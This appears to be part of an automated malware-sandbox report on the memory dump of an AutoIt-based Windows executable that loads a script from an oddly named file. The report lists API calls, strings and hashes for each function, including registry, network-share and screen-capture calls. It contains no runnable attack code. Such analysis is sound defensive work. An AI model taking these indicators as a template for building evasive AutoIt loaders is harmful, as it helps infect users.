                • Opcode ID: a9ebf5cc04f77b742cbc964064a11f73e3aa68c8c348c574d456546e66e5582e
                • Instruction ID: ca75df2b364e8831ddb4bbdc78bbd2b4c157d0ef3ab89114df15853b689c112f
                • Opcode Fuzzy Hash: a9ebf5cc04f77b742cbc964064a11f73e3aa68c8c348c574d456546e66e5582e
                • Instruction Fuzzy Hash: 38712271900215AFDB04DFA4DD88EAEBBB9FF48310F104229F519A7291D774A981CFA8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCursorPos.USER32(?,?), ref: 00446625
                • GetDesktopWindow.USER32 ref: 0044663A
                • GetWindowRect.USER32 ref: 00446641
                • GetWindowLongW.USER32(?,000000F0), ref: 00446699
                • GetWindowLongW.USER32(?,000000F0), ref: 004466AC
                • DestroyWindow.USER32(?), ref: 004466BD
                • CreateWindowExW.USER32 ref: 0044670B
                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00446729
                • SendMessageW.USER32(?,00000418,00000000,?), ref: 0044673D
                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 0044674D
                • SendMessageW.USER32(?,00000421,?,?), ref: 0044676D
                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00446783
                • IsWindowVisible.USER32 ref: 004467A3
                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004467BF
                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 004467D3
                • GetWindowRect.USER32 ref: 004467EA
                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00446808
                • GetMonitorInfoW.USER32 ref: 00446820
                • CopyRect.USER32 ref: 00446835
                • SendMessageW.USER32(?,00000412,00000000), ref: 0044688B
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                • String ID: ($,$tooltips_class32
                • API String ID: 225202481-3320066284
                • Opcode ID: 78b12f885743bd2bfdfb01396a78f55834592f114ae1a0983fe640aa07eec1a1
                • Instruction ID: f199cdef19119e69ce6eee1c779607871887572d5a1a2bd9c1bf60db431eab9b
                • Opcode Fuzzy Hash: 78b12f885743bd2bfdfb01396a78f55834592f114ae1a0983fe640aa07eec1a1
                • Instruction Fuzzy Hash: 22B18070A00309AFEB14DFA4CD85FAEB7B5FF49300F10855AE519AB281DB78AD45CB58
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                • API String ID: 1503153545-1459072770
                • Opcode ID: 2c78a2cd4f7e0adff4185e135b2bfbebefd980ec325bd5401e82ede3bc7bc3de
                • Instruction ID: e99d83294ece70ac57446c375a5ff3ce392f42ebc62744769e6d5baf9e112664
                • Opcode Fuzzy Hash: 2c78a2cd4f7e0adff4185e135b2bfbebefd980ec325bd5401e82ede3bc7bc3de
                • Instruction Fuzzy Hash: 64512872A0021877E710BA659C43EBF776CDF45715F40812FFC09B6293EA7DAA0192AD
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __wcsicoll$__wcsnicmp
                • String ID: ,QG$ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                • API String ID: 790654849-347499930
                • Opcode ID: 24dafac37a65c283bb25874013317229198de2321c32351909c018cd9b6a7e09
                • Instruction ID: dc1880d83ec0c255b1f54e1501b8f5fef53c9caf4f8d72ecdd2a050ffd37b9d3
                • Opcode Fuzzy Hash: 24dafac37a65c283bb25874013317229198de2321c32351909c018cd9b6a7e09
                • Instruction Fuzzy Hash: EF316871E04209A6DB10E661DD43BEE736C9F11706F504127FE45BF1D2EF6CAE0886AA
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99cb99217b17c5d9a4a5fa1815c85413cc79500ae075e94f1b4d5d3dedda790f
                • Instruction ID: e31bc72afab22e698491e8647d3acc9d34ded054d0aba45e41c70eb465dba7fb
                • Opcode Fuzzy Hash: 99cb99217b17c5d9a4a5fa1815c85413cc79500ae075e94f1b4d5d3dedda790f
                • Instruction Fuzzy Hash: D5C159727002046BF720CFA8DC46FABB7A4EF55311F10417BFA05EA2C0D7B999058795
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00432B7B: __time64.LIBCMT ref: 00432B87
                • _fseek.LIBCMT ref: 00442AB0
                • __wsplitpath.LIBCMT ref: 00442B10
                • _wcscpy.LIBCMT ref: 00442B25
                • _wcscat.LIBCMT ref: 00442B3A
                • __wsplitpath.LIBCMT ref: 00442B64
                • _wcscat.LIBCMT ref: 00442B7C
                • _wcscat.LIBCMT ref: 00442B91
                • __fread_nolock.LIBCMT ref: 00442BC8
                • __fread_nolock.LIBCMT ref: 00442BD9
                • __fread_nolock.LIBCMT ref: 00442BF8
                • __fread_nolock.LIBCMT ref: 00442C09
                • __fread_nolock.LIBCMT ref: 00442C2A
                • __fread_nolock.LIBCMT ref: 00442C3B
                • __fread_nolock.LIBCMT ref: 00442C4C
                • __fread_nolock.LIBCMT ref: 00442C5D
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 004426B4
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 004426F6
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442714
                  • Part of subcall function 0044268F: _wcscpy.LIBCMT ref: 00442748
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442758
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442776
                  • Part of subcall function 0044268F: _wcscpy.LIBCMT ref: 004427A7
                • __fread_nolock.LIBCMT ref: 00442CED
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                • String ID:
                • API String ID: 2054058615-0
                • Opcode ID: 0aa3da7223e3953df6c0df051da1ff761bcb21dd2dfb0578287ee68ecce8adaf
                • Instruction ID: 91ebd86197f8007c9d10c448d5a9676df7a4475d6ea05a7df747ee3f7eeea791
                • Opcode Fuzzy Hash: 0aa3da7223e3953df6c0df051da1ff761bcb21dd2dfb0578287ee68ecce8adaf
                • Instruction Fuzzy Hash: 1EC160B2508340ABD324DF65D981EEBB7E9FFC8704F404D2EF68987240E6B99544CB66
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00438716
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Window
                • String ID: 0
                • API String ID: 2353593579-4108050209
                • Opcode ID: bb3ef2a5c41d7e1f13a27ca82bab2f26fad87abfb218b970b40375b80fc8ba8d
                • Instruction ID: 0ea1c98733b78a00e85c542a32363e9fef487869e671399b9f36ba6dcea138b8
                • Opcode Fuzzy Hash: bb3ef2a5c41d7e1f13a27ca82bab2f26fad87abfb218b970b40375b80fc8ba8d
                • Instruction Fuzzy Hash: F9B1D2B02043419BE324DF24CC85BABFBE4BB89304F14592EF595972D1CBB8E945CB59
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 003F2390: _wcslen.LIBCMT ref: 003F239D
                  • Part of subcall function 003F2390: _memmove.LIBCMT ref: 003F23C3
                • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0045EE0E
                • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0045F1FA
                • IsWindow.USER32(?), ref: 0045F22F
                • GetDesktopWindow.USER32 ref: 0045F2EB
                • EnumChildWindows.USER32 ref: 0045F2F2
                • EnumWindows.USER32(00451059,?), ref: 0045F2FA
                  • Part of subcall function 004359E6: _wcslen.LIBCMT ref: 004359F6
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE$dNG
                • API String ID: 329138477-3928073304
                • Opcode ID: 0a7458455e10acde7bf768dd1f6be66c94a9fe278e1130bd5e6e34bf0f500791
                • Instruction ID: 0c80b61a05ff62b8555de9dc97e8e7afa2378736351e64d3d7c15c9f8f33d3ff
                • Opcode Fuzzy Hash: 0a7458455e10acde7bf768dd1f6be66c94a9fe278e1130bd5e6e34bf0f500791
                • Instruction Fuzzy Hash: B8F1E6715243449BCB00EF61D882AABB3A4BF94305F04856EFD455B283DB79E90DCBA7
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • __wcsicoll.LIBCMT ref: 003F2262
                • __wcsicoll.LIBCMT ref: 003F2278
                • __wcsicoll.LIBCMT ref: 003F228E
                  • Part of subcall function 004013CB: __wcsicmp_l.LIBCMT ref: 0040144B
                • __wcsicoll.LIBCMT ref: 003F22A4
                • _wcscpy.LIBCMT ref: 003F22C4
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\31956653\thjfdg.xcp,00000104), ref: 00418AD6
                • _wcscpy.LIBCMT ref: 00418B29
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\31956653\thjfdg.xcp$CMDLINE$CMDLINERAW$hNG
                • API String ID: 574121520-772976596
                • Opcode ID: b4b7e4b4a9085c02a88d7c71b1b59cbcd410ca872779be885c82ae66ddc17c39
                • Instruction ID: 99521299d097c3ea4ddb10065a40baeff210d6271a63c9ee4edbb1701ccc27eb
                • Opcode Fuzzy Hash: b4b7e4b4a9085c02a88d7c71b1b59cbcd410ca872779be885c82ae66ddc17c39
                • Instruction Fuzzy Hash: 01717071D1420EDBCF01EBA0DC92AFE7B74AF50344F00442AEA057B295EBB56949CBE5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _fseek.LIBCMT ref: 004428A1
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 004426B4
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 004426F6
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442714
                  • Part of subcall function 0044268F: _wcscpy.LIBCMT ref: 00442748
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442758
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442776
                  • Part of subcall function 0044268F: _wcscpy.LIBCMT ref: 004427A7
                • __fread_nolock.LIBCMT ref: 004428D8
                • __fread_nolock.LIBCMT ref: 004428E8
                • __fread_nolock.LIBCMT ref: 00442901
                • __fread_nolock.LIBCMT ref: 0044291B
                • _fseek.LIBCMT ref: 00442935
                • _malloc.LIBCMT ref: 00442940
                • _malloc.LIBCMT ref: 0044294C
                • __fread_nolock.LIBCMT ref: 0044295D
                • _free.LIBCMT ref: 0044298C
                • _free.LIBCMT ref: 00442995
                Strings
                • C:\Users\user\31956653\thjfdg.xcp, xrefs: 00442842
                • >>>AUTOIT SCRIPT<<<, xrefs: 004428B0
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\31956653\thjfdg.xcp
                • API String ID: 1255752989-362982297
                • Opcode ID: 4b185a0d3ba19172f171b6a8ba8b9d250b19bdf87faf0a21dbf7604220102f97
                • Instruction ID: f2499638239bcffcbaac5966cc4fd15be0deede3cd2b8eccdb6efdd6c7fe348c
                • Opcode Fuzzy Hash: 4b185a0d3ba19172f171b6a8ba8b9d250b19bdf87faf0a21dbf7604220102f97
                • Instruction Fuzzy Hash: 325102F1900214AFDB20DF69DC81B9AB7B8EF88304F0045AEF64CE7241E7759A94CB59
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __wcsicoll$IconLoad
                • String ID: blank$info$question$stop$warning
                • API String ID: 2485277191-404129466
                • Opcode ID: 5a26dd7bb0a12033ce1ff021f7a9e5f33556f64d0263ba313632164664f2981d
                • Instruction ID: 26c31165e07ff319bf43211074fcb9052c4dd673e1d4287c8b4441a1c6fd3065
                • Opcode Fuzzy Hash: 5a26dd7bb0a12033ce1ff021f7a9e5f33556f64d0263ba313632164664f2981d
                • Instruction Fuzzy Hash: 92219B72744215A6DB106B66BC06FDB735CDF94352F444037FD08E2286E3B9A92492FD
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadIconW.USER32 ref: 004445C1
                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004445D3
                • SetWindowTextW.USER32(?,?), ref: 004445ED
                • GetDlgItem.USER32 ref: 00444605
                • SetWindowTextW.USER32(00000000,?), ref: 0044460C
                • GetDlgItem.USER32 ref: 0044461D
                • SetWindowTextW.USER32(00000000,?), ref: 00444624
                • SendDlgItemMessageW.USER32 ref: 00444646
                • SendDlgItemMessageW.USER32 ref: 00444660
                • GetWindowRect.USER32 ref: 0044466A
                • SetWindowTextW.USER32(?,?), ref: 004446DA
                • GetDesktopWindow.USER32 ref: 004446E4
                • GetWindowRect.USER32 ref: 004446EB
                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00444739
                • GetClientRect.USER32 ref: 00444747
                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 00444771
                • SetTimer.USER32 ref: 004447B4
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                • String ID:
                • API String ID: 3869813825-0
                • Opcode ID: 98f3b0c338d24746c81f59f2fea7662f6fa5c6b073d3f1dac3ed70b618b02258
                • Instruction ID: 569f5c9c37333ceb7f5ce444f726b5d0d4fbc185150aa31dd550c28815289fec
                • Opcode Fuzzy Hash: 98f3b0c338d24746c81f59f2fea7662f6fa5c6b073d3f1dac3ed70b618b02258
                • Instruction Fuzzy Hash: 52618E71A00705ABEB20DFA8CD89FABB7F8BB84704F104919E64697690D7B8F944CB54
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 004620BD
                • _memset.LIBCMT ref: 004620DB
                • GetLocalTime.KERNEL32(?), ref: 0046225C
                • __swprintf.LIBCMT ref: 00462273
                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0047BF48), ref: 004624A6
                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0047BF48), ref: 004624C0
                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0047BF48), ref: 004624DA
                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0047BF48), ref: 004624F4
                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0047BF48), ref: 0046250E
                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0047BF48), ref: 00462528
                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0047BF48), ref: 00462542
                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0047BF48), ref: 0046255C
                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0047BF48), ref: 00462576
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: FolderPath$_memset$LocalTime__swprintf
                • String ID: %.3d
                • API String ID: 645292623-986655627
                • Opcode ID: a5ea3ad103ff3256a7e8ca012b0ea9e6df87f03bf6ab6db430c16b3067ee1ce3
                • Instruction ID: c10035661ebfba78fcc0a7bd5b2f4e6d651683768d20cb6519ab7f92e1ed3e35
                • Opcode Fuzzy Hash: a5ea3ad103ff3256a7e8ca012b0ea9e6df87f03bf6ab6db430c16b3067ee1ce3
                • Instruction Fuzzy Hash: 46C1FD3265420CABD720FB60DD86FFE7378FB44701F4044AAFA09A70D1EBB59A458B65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Window$CreateDestroy
                • String ID: ,$dNG$tooltips_class32
                • API String ID: 1109047481-1612692394
                • Opcode ID: 70202940d3e1f40b7202d2dc7c90e9de4b88c4a29169812647eebcb4cf4ee71a
                • Instruction ID: 18b16edc9481ffe0197d0ac9d89c54e4cb3d47c6b31312cd1289667fbb99736e
                • Opcode Fuzzy Hash: 70202940d3e1f40b7202d2dc7c90e9de4b88c4a29169812647eebcb4cf4ee71a
                • Instruction Fuzzy Hash: 1071B375640208AFEB20CF5CDC85FBA77B8EB59710F10812BF9449B351D674AD52CB98
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 0045E7EF
                • GetMenuItemInfoW.USER32 ref: 0045E877
                • GetMenuItemCount.USER32 ref: 0045E90B
                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 0045E99F
                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 0045E9A8
                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 0045E9B1
                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 0045E9BA
                • GetMenuItemCount.USER32 ref: 0045E9C3
                • SetMenuItemInfoW.USER32 ref: 0045E9FB
                • GetCursorPos.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 0045EA05
                • SetForegroundWindow.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 0045EA0F
                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 0045EA25
                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 0045EA32
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                • String ID: 0
                • API String ID: 3993528054-4108050209
                • Opcode ID: 0c2c31472480ce76f8833f589b86f057a79d4b67fcd6deadfaea3a94ba31c9ef
                • Instruction ID: 5ab3c8467b15411f44a7aa092a2c2ed17b6b2dc28b41f69ba3d6732f2980a5c6
                • Opcode Fuzzy Hash: 0c2c31472480ce76f8833f589b86f057a79d4b67fcd6deadfaea3a94ba31c9ef
                • Instruction Fuzzy Hash: 1A713570604304BBE724DB65CC45F5BB7A4AF44724F30471FF9A5672D2C7B8A9488B19
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00421BF6
                • __swprintf.LIBCMT ref: 00421C1B
                • _wcslen.LIBCMT ref: 00421C27
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00421C54
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                • String ID: :$\$\??\%s
                • API String ID: 2192556992-3457252023
                • Opcode ID: 0ae0fb815f0cfb024f396cde450890ee975165ec3a4fc6832aaa864f52df95ed
                • Instruction ID: 4fbf07740a2e934c14a0455698af2ed71f37f692f4b6b48b256f1709a0419f9e
                • Opcode Fuzzy Hash: 0ae0fb815f0cfb024f396cde450890ee975165ec3a4fc6832aaa864f52df95ed
                • Instruction Fuzzy Hash: CC412A72740318A6D730DB64EC45FDB73ACFF54700F4081AAFA08A2191E7B49A848BD4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __wcsicoll
                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                • API String ID: 3832890014-4202584635
                • Opcode ID: b7ed2594dd3b001d908033011223467baadb2129e0162e9956eb3fe864ec0bbd
                • Instruction ID: 0c243bb2cc05cc7b0705c0636fd78e2bb816ecc59b93e7a78a98be643766ba87
                • Opcode Fuzzy Hash: b7ed2594dd3b001d908033011223467baadb2129e0162e9956eb3fe864ec0bbd
                • Instruction Fuzzy Hash: 3C1129A264421512EA2031667C03BEB629CCF1139BF04503BFE0CE16C5F76EEA2082ED
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00456EB0
                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00456F29
                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00456FBE
                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00456FEA
                • _memmove.LIBCMT ref: 00457005
                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0045700E
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 0045702B
                • _memmove.LIBCMT ref: 004570B9
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 0045710E
                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 004570F8
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                • SafeArrayUnaccessData.OLEAUT32(00469A0A), ref: 00456F95
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • SafeArrayUnaccessData.OLEAUT32(00469A0A), ref: 0045717D
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                • String ID: qE
                • API String ID: 2170234536-3567479092
                • Opcode ID: a9a27f4269ccc9b6dea3cbb247b2dde0f4037fe3ee6171d14155b9322592569a
                • Instruction ID: 91ebd53e07e4f121d8a84f47ecdcf7f867486f631cc5a1e087c462953be3f449
                • Opcode Fuzzy Hash: a9a27f4269ccc9b6dea3cbb247b2dde0f4037fe3ee6171d14155b9322592569a
                • Instruction Fuzzy Hash: 2BB114756002059FD710CF58D884BAAB7B5FF48305F14807EEE499B392D73AE889CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 00457BDD
                • GetMenuItemInfoW.USER32 ref: 00457C43
                • SetMenuItemInfoW.USER32 ref: 00457C7C
                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 00457C8E
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: InfoItemMenu$Sleep_memset
                • String ID: 0
                • API String ID: 1504565804-4108050209
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00417F37,?,0000138C,?,00000001,?,?,?), ref: 004505F5
                • LoadStringW.USER32(00000000,?,00417F37,?), ref: 004505FC
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00417F37,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 0045061C
                • LoadStringW.USER32(00000000,?,00417F37,?), ref: 00450623
                • __swprintf.LIBCMT ref: 00450661
                • __swprintf.LIBCMT ref: 00450679
                • _wprintf.LIBCMT ref: 0045072D
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00450746
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                • API String ID: 3631882475-2268648507
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetDC.USER32(00000000), ref: 0042139D
                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004213AE
                • CreateCompatibleDC.GDI32(00000000), ref: 004213B8
                • SelectObject.GDI32(00000000,?), ref: 004213C5
                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042142B
                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00421464
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                • String ID: (
                • API String ID: 3300687185-3887548279
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                • String ID:
                • API String ID: 461458858-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 003F2390: _wcslen.LIBCMT ref: 003F239D
                  • Part of subcall function 003F2390: _memmove.LIBCMT ref: 003F23C3
                • _memset.LIBCMT ref: 00448660
                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00448698
                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004486B5
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 004486D3
                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00448701
                • CLSIDFromString.OLE32(?,?), ref: 0044872A
                • RegCloseKey.ADVAPI32(000001FE), ref: 00448736
                • RegCloseKey.ADVAPI32(?), ref: 0044873C
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset_wcslen
                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$$dNG
                • API String ID: 2901625445-2203316046
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00420030
                • GetFileSize.KERNEL32(00000000,00000000), ref: 0042004B
                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00420056
                • GlobalLock.KERNEL32 ref: 00420063
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00420072
                • GlobalUnlock.KERNEL32(00000000), ref: 00420079
                • CloseHandle.KERNEL32(00000000), ref: 00420080
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0042008D
                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004729F8,?), ref: 004200AB
                • GlobalFree.KERNEL32 ref: 004200BD
                • GetObjectW.GDI32(?,00000018,?), ref: 004200E4
                • CopyImage.USER32 ref: 00420115
                • DeleteObject.GDI32(?), ref: 0042013D
                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00420154
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                • String ID:
                • API String ID: 3969911579-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __wcsicoll$ClassMessageNameParentSend
                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                • API String ID: 3125838495-3381328864
                Uniqueness

                Uniqueness Score: -1.00%

